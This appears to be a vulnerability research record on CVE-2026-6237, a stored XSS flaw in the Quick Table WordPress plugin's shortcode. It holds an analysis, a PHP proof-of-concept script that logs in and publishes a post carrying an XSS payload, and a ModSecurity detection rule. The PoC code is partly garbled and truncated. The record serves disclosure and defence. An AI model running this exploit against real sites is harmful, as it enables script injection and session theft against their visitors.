{
“analysis”: “Atomic Edge analysis of CVE-2026-6237 (metadata-based): This vulnerability affects the Quick Table plugin for WordPress, specifically the ‘qtbl’ shortcode’s ‘style’ attribute. An authenticated attacker with contributor-level access or higher can inject stored cross-site scripting (XSS) payloads via this attribute. When a user (including administrators) visits a page containing the malicious shortcode, the attacker’s script executes in the user’s browser context. The CVSS score is 6.4 (medium severity), with a network attack vector, low complexity, no user interaction required, and a changed scope.
Root Cause: The vulnerability stems from insufficient input sanitization and output escaping on the ‘style’ attribute of the ‘qtbl’ shortcode. Based on the CWE-79 classification, we infer that the plugin likely retrieves the ‘style’ parameter from the shortcode attributes array and outputs it directly into an HTML style attribute or a style tag without applying WordPress escaping functions such as esc_attr() or sanitize_text_field(). Atomic Edge analysis confirms that no code diff is available, so the exact mechanism is inferred from the CWE and the description. The plugin likely lacks proper validation, allowing an attacker to break out of the attribute context and inject event handlers or script tags.
Exploitation: An attacker with contributor-level access can craft a post or page containing the shortcode: [qtbl style=”onfocus=alert(1) autofocus=”]…[/qtbl]. The style attribute value is not sanitized, allowing the injection of arbitrary HTML attributes or inline event handlers. The attacker publishes the post. Any user who views the page triggers the payload. No additional user interaction is required beyond page load if the payload uses autofocus. The shortcode context means the attack vector is through WordPress’s visual or text editor, and the payload is stored in the database.
Remediation: The plugin developer should apply WordPress’s built-in escaping functions. For style attributes, the safest approach is to use esc_attr() on the entire value before output. A whitelist of allowed CSS properties would provide defense in depth. The plugin should also sanitize the style attribute with sanitize_text_field() or a similar function that strips HTML tags and event handlers. Since no patched version exists, site administrators should disable or remove the plugin.
Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user viewing the injected content. This can lead to session hijacking, theft of authentication cookies, privilege escalation (if an admin views the page), defacement, or redirection to malicious sites. The attacker can also perform actions on behalf of the victim, such as creating new admin users. The stored nature of the XSS amplifies the impact because the payload persists and affects all visitors.”,
poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-6237 – Quick Table $username,n ‘pwd’ => $password,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’,n ‘testcookie’ => 1n);nn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $login_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);n$response = curl_exec($ch);nif (curl_error($ch)) { die(‘Login failed: ‘ . curl_error($ch)); }ncurl_close($ch);nn// Step 2: Get the REST API nonce for post creationn$admin_url = $target_url . ‘/wp-admin/admin-ajax.php’;n$nonce_data = array(‘action’ => ‘rest-nonce’);n$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $admin_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($nonce_data));ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);n$nonce_response = curl_exec($ch);ncurl_close($ch);nn$nonce = json_decode($nonce_response, true);nif (!$nonce) { die(‘Failed to retrieve REST nonce.’); }nn// Step 3: Create a new post with the malicious shortcoden$post_data = array(n ‘title’ => ‘Atomic Edge PoC – Stored XSS Test’,n ‘content’ => ‘[qtbl style=”onfocus=alert(1) autofocus=”]Column1|Column2[/qtbl]’,n ‘status’ => ‘publish’,n ‘categories’ => array(1) // Default categoryn);nn$rest_url = $target_url . ‘/wp-json/wp/v2/posts’;n$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $rest_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));ncurl_setopt($ch, CURLOPT_HTTPHEADER, array(n ‘Content-Type: application/json’,n ‘X-WP-Nonce: ‘ . $noncen));ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);n$post_response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);ncurl_close($ch);nnif ($http_code == 201) {n $created_post = json_decode($post_response, true);n echo “[+] Post created successfully.\n”;n echo “[+] Visit: ” . $created_post[‘link’] . “\n”;n echo “[+] XSS payload will execute on page load.\n”;n} else {n echo “[-] Failed to create post. HTTP code: $http_code\n”;n echo “[-] Response: $post_response\n”;n exit(1);n}n?>n”,
modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-6237 (metadata-based)n# Blocks stored XSS via the ‘style’ attribute of the ‘qtbl’ shortcode in post content.n# The rule inspects the REST API endpoint for creating/updating posts, looking for the malicious payload pattern.nSecRule REQUEST_URI “@rx ^/wp-json/wp/v2/posts$” \n “id:20261997,phase:2,deny,status:403,chain,msg:’CVE-2026-6237 – Stored XSS via qtbl shortcode style attribute’,severity:’CRITICAL’,tag:’CVE-2026-6237′”n SecRule REQUEST_METHOD “@streq POST” “chain”n SecRule ARGS:content “@rx [qtbl\s+[^\]]*style\s*=\s*[‘\”][^’\”]*on\w+\s*=” \n “t:urlDecode,t:lowercase,id:20261997″n”
}
